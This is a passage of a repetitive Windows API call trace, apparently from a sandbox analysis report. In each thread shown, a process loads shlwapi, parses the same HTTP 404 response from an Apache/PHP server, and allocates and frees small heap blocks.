| out: hHeap=0x840000) returned 1 [0283.618] GetProcessHeap () returned 0x840000 [0283.618] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 170 os_tid = 0x88c [0284.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.163] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:03 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.163] GetProcessHeap () returned 0x840000 [0284.163] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0284.163] GetProcessHeap () returned 0x840000 [0284.163] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0284.163] GetProcessHeap () returned 0x840000 [0284.163] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 171 os_tid = 0x82c [0284.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0284.723] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:03 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.723] GetProcessHeap () returned 0x840000 [0284.723] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0284.723] GetProcessHeap () returned 0x840000 [0284.723] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0284.723] GetProcessHeap () returned 0x840000 [0284.723] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 172 os_tid = 0x880 [0285.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0285.325] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:04 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.325] GetProcessHeap () returned 0x840000 [0285.325] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0285.325] GetProcessHeap () returned 0x840000 [0285.325] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0285.325] GetProcessHeap () returned 0x840000 [0285.325] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 173 os_tid = 0x868 [0285.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0285.968] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:05 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.968] GetProcessHeap () returned 0x840000 [0285.968] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0285.968] GetProcessHeap () returned 0x840000 [0285.968] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0285.968] GetProcessHeap () returned 0x840000 [0285.968] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 174 os_tid = 0x838 [0286.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.547] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:05 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.547] GetProcessHeap () returned 0x840000 [0286.547] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0286.547] GetProcessHeap () returned 0x840000 [0286.547] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0286.547] GetProcessHeap () returned 0x840000 [0286.547] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 175 os_tid = 0x784 [0287.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.039] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:06 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.040] GetProcessHeap () returned 0x840000 [0287.040] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0287.040] GetProcessHeap () returned 0x840000 [0287.040] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0287.040] GetProcessHeap () returned 0x840000 [0287.040] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 176 os_tid = 0xe74 [0287.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.603] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:06 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.604] GetProcessHeap () returned 0x840000 [0287.604] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0287.604] GetProcessHeap () returned 0x840000 [0287.604] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0287.604] GetProcessHeap () returned 0x840000 [0287.604] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 177 os_tid = 0x680 [0288.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.065] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.066] GetProcessHeap () returned 0x840000 [0288.066] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0288.066] GetProcessHeap () returned 0x840000 [0288.066] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0288.066] GetProcessHeap () returned 0x840000 [0288.066] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 178 os_tid = 0x6c0 [0288.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.572] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.572] GetProcessHeap () returned 0x840000 [0288.572] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878ab8 [0288.572] GetProcessHeap () returned 0x840000 [0288.572] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878ab8 | out: hHeap=0x840000) returned 1 [0288.572] GetProcessHeap () returned 0x840000 [0288.572] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 179 os_tid = 0x34c [0289.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.068] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:08 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0289.069] GetProcessHeap () returned 0x840000 [0289.069] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0289.069] GetProcessHeap () returned 0x840000 [0289.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0289.069] GetProcessHeap () returned 0x840000 [0289.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 180 os_tid = 0x478 [0289.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.615] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:08 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0289.616] GetProcessHeap () returned 0x840000 [0289.616] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0289.616] GetProcessHeap () returned 0x840000 [0289.616] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0289.616] GetProcessHeap () returned 0x840000 [0289.616] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 181 os_tid = 0x46c [0290.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.107] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:09 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0290.107] GetProcessHeap () returned 0x840000 [0290.107] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0290.107] GetProcessHeap () returned 0x840000 [0290.107] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0290.107] GetProcessHeap () returned 0x840000 [0290.107] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 182 os_tid = 0xa80 [0290.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.605] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:09 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0290.605] GetProcessHeap () returned 0x840000 [0290.605] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0290.605] GetProcessHeap () returned 0x840000 [0290.605] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0290.605] GetProcessHeap () returned 0x840000 [0290.605] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 183 os_tid = 0x718 [0291.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.183] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:10 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0291.183] GetProcessHeap () returned 0x840000 [0291.183] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0291.183] GetProcessHeap () returned 0x840000 [0291.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0291.183] GetProcessHeap () returned 0x840000 [0291.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 184 os_tid = 0x578 [0291.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0291.764] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:10 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0291.764] GetProcessHeap () returned 0x840000 [0291.764] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0291.764] GetProcessHeap () returned 0x840000 [0291.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0291.764] GetProcessHeap () returned 0x840000 [0291.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 185 os_tid = 0x9b0 [0292.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.302] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:11 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.302] GetProcessHeap () returned 0x840000 [0292.302] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0292.302] GetProcessHeap () returned 0x840000 [0292.302] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0292.302] GetProcessHeap () returned 0x840000 [0292.302] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 186 os_tid = 0x580 [0292.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.825] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:11 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.825] GetProcessHeap () returned 0x840000 [0292.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0292.826] GetProcessHeap () returned 0x840000 [0292.826] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0292.826] GetProcessHeap () returned 0x840000 [0292.826] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 187 os_tid = 0x858 [0293.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.258] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:12 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.258] GetProcessHeap () returned 0x840000 [0293.258] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0293.258] GetProcessHeap () returned 0x840000 [0293.258] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0293.258] GetProcessHeap () returned 0x840000 [0293.258] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 188 os_tid = 0xe84 [0293.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0293.824] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:12 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.824] GetProcessHeap () returned 0x840000 [0293.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0293.825] GetProcessHeap () returned 0x840000 [0293.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0293.825] GetProcessHeap () returned 0x840000 [0293.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 189 os_tid = 0x834 [0294.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.337] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:13 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0294.337] GetProcessHeap () returned 0x840000 [0294.337] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0294.337] GetProcessHeap () returned 0x840000 [0294.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0294.337] GetProcessHeap () returned 0x840000 [0294.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 190 os_tid = 0x830 [0294.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0294.881] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:14 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0294.881] GetProcessHeap () returned 0x840000 [0294.881] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0294.881] GetProcessHeap () returned 0x840000 [0294.881] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0294.881] GetProcessHeap () returned 0x840000 [0294.881] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 191 os_tid = 0x10b4 [0295.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.387] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:14 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.387] GetProcessHeap () returned 0x840000 [0295.387] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0295.387] GetProcessHeap () returned 0x840000 [0295.387] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0295.387] GetProcessHeap () returned 0x840000 [0295.387] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 192 os_tid = 0x12e8 [0295.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0295.908] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:15 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0295.908] GetProcessHeap () returned 0x840000 [0295.908] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0295.908] GetProcessHeap () returned 0x840000 [0295.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0295.908] GetProcessHeap () returned 0x840000 [0295.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 193 os_tid = 0x10c8 [0296.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.462] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:15 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.462] GetProcessHeap () returned 0x840000 [0296.462] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0296.462] GetProcessHeap () returned 0x840000 [0296.462] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0296.462] GetProcessHeap () returned 0x840000 [0296.462] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 194 os_tid = 0x588 [0296.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0296.959] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:16 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0296.960] GetProcessHeap () returned 0x840000 [0296.960] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0296.960] GetProcessHeap () returned 0x840000 [0296.960] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0296.960] GetProcessHeap () returned 0x840000 [0296.960] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 195 os_tid = 0xd28 [0297.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0297.547] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:16 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0297.547] GetProcessHeap () returned 0x840000 [0297.547] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0297.547] GetProcessHeap () returned 0x840000 [0297.547] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0297.547] GetProcessHeap () returned 0x840000 [0297.547] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 196 os_tid = 0x1d0 [0298.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.012] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:17 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.012] GetProcessHeap () returned 0x840000 [0298.012] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0298.012] GetProcessHeap () returned 0x840000 [0298.012] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0298.012] GetProcessHeap () returned 0x840000 [0298.012] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 197 os_tid = 0x648 [0298.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.567] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:17 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0298.567] GetProcessHeap () returned 0x840000 [0298.567] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0298.567] GetProcessHeap () returned 0x840000 [0298.567] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0298.567] GetProcessHeap () returned 0x840000 [0298.567] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 198 os_tid = 0x560 [0299.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.031] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:18 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.031] GetProcessHeap () returned 0x840000 [0299.031] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0299.031] GetProcessHeap () returned 0x840000 [0299.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 